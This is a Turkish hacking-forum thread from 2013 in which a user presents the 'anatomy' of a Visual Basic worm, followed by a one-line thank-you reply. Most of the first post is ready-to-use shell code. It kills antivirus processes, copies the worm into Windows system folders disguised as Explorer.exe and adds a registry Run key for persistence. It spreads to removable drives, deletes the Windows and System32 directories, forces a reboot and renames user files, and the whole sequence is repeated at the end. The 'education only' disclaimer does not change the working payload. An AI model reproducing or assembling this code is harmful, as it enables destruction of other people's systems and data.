İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Solucanlar nedir? Nasıl üretilyor?

17-07-2013 23:11
#1
bigbox - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
Azeri/Baki
Yaş:
27
Mesajlar:
3.233
Teşekkür (Etti):
77
Teşekkür (Aldı):
410
Konular:
277
Ticaret:
(0) %
Anlatacagimiz sadece Solucan virüsünün bir Anatomisidir. mantıını kavrayıp tamamen güvenlik almanız için yazılmıştır.
Visual Basic ile yazılan virüslerde öncelikle Silme,kopyalama,kayıt defterine ekle gibi kodlar kullanılıyor. Ama Antivirüsler bunu gördüğü için solucanı yazanlar Virüslerini MS-DOS kodlarıyla yapıyrlar. Peki bunlar nasıl yapılıyor ?.Tabiki "Shell" komutuyla "Cmd" dosyasını çalıştırarak bunun üstesinden geliyorlar.

Örnek:

shell "cmd /c del /f /q /s %windir%\\\\\\\\*.*"
Yukarıda gördüğünüz en baştaki komut "Shell" yani çağırma komutu.Bununla "CMD" dosyasını çalıştırıp ms-dos komutları veriliyor. MS_DOS komutunda ise şu yazmakta."del /f /q /s %Windir% yani Windowsun içindeki herşeyi sil. Aşağıda bilgi vererek kısa kısa kodların da ne olduğunu tanıtalım.
Bir solucan öncelikle kendini engelleyen programları kapatmak ister. Bunlar Antivirüsler, güvenlik duvarları, firewall türevi programlar. Bunun için şu komutu kullanıyorlar.

shell "cmd /c taskkill /t /im Eset.exe"
Bunu forma yapıştırıp kaydettikten sonra "Görev yöneticisi"nde eset adında çalışan antivirüsü kapatmakta.

Ama hedefin bilgisayarında acaba hangi antivirüs var? Hackerlar bunun üstesinden de arama motorlarından bütün antivirüslerin listesini indiriyor.
On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
gibi.

Sonraki aşamaları ise, solucan bütün antivirüsleri ve firewalları devre dışı bıraktıktan sonra yaptığı şey kendini sisteme kopyalamak ve kendini kayıt defterine eklemektir. Bunuda xCopy komutuyla yaptırıyorlar .Aşağıda kopyalama kodunda "VirüsAdı.exe" ile yazılan yere virüsün ismini yazıyorar. Örneğin bütün kodlar bittikten sonra virüsün ismine "Nuke" koyar iseler aynı şekilde bütün "Virüsadı.exe" kısımlarına virüsünüz adlarını yazıyorlar.

shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
Evet.Yukarıda verilen kodları incelerseniz şunu görürsünüz. Hackerlerin yaptığı virüs kendini WINDOWS\\System ve System32 ye kopyalıyor. Bu sayede kendini windows ile birlikte başlatıyor ama aktif olmuyor. Bunun için kayıt defterine kendini ekleme özelliği ekliyorlar . Onu da şöyle yapmaktalar.

shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscu rrentversionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscu rrentversionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"

Yukarda yine "Shell" komutunu kullanarak virüslerini kayıt defterine ekliyorlar. Windows'un her açılışında virüs kendini aktif ediyor.

Bütün bunları yaptıktan sonra artık hackerlar virüslerini güvene alıyorlar. Saldırı kısmı şimdi başlıyor ; Tabi bunlar sadece işin nasıl döndüğünü öğrenmeniz için. Bilgi dışında kesinlikle kullanmayın.

Hackerların bundan sonra yaptıkları hayal güçlerini kuallanmak. Flash belleklerden virüsün bulaşmasını isterlerse, kendini Flaş belleklere kopyalaması için lazım olan kodu yani "xCopy"kodunu kullanıyorlar. Şöyle bir tasarlama yapıyorlar;

shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "D:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "E:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "G:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "H:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "I:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "L:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "C:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "J:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "K:\\Proces.exe"

shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Dikkat Virus Var"msgbox "Sistem Hatasi"msgbox "Solucan Var"Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "



On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"
shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Hacked by X"msgbox "Sisteminiz silindi"msgbox "Bilgisayarınız çökme aşamasında..."Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "

İşte bunlar bir solucanın anatomisi. Bu kodlar sadece ve sadece eğitim içindir . Kesinlikle bir başkasında denemeyin.
Kullanıcı İmzası






















All that glitters isn't gold
-Parlayan hersey kizil diyildir

Hacking And Network Security ©
suleyman0772 Teşekkür etti.

20-07-2013 20:32
#2
Üyelik tarihi:
07/2013
Nereden:
Baku
Mesajlar:
295
Teşekkür (Etti):
56
Teşekkür (Aldı):
89
Konular:
53
Ticaret:
(0) %
Guzel Paylasim
Kullanıcı İmzası
SEHITLER Olmez,VATAN Bolunmez!!!

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı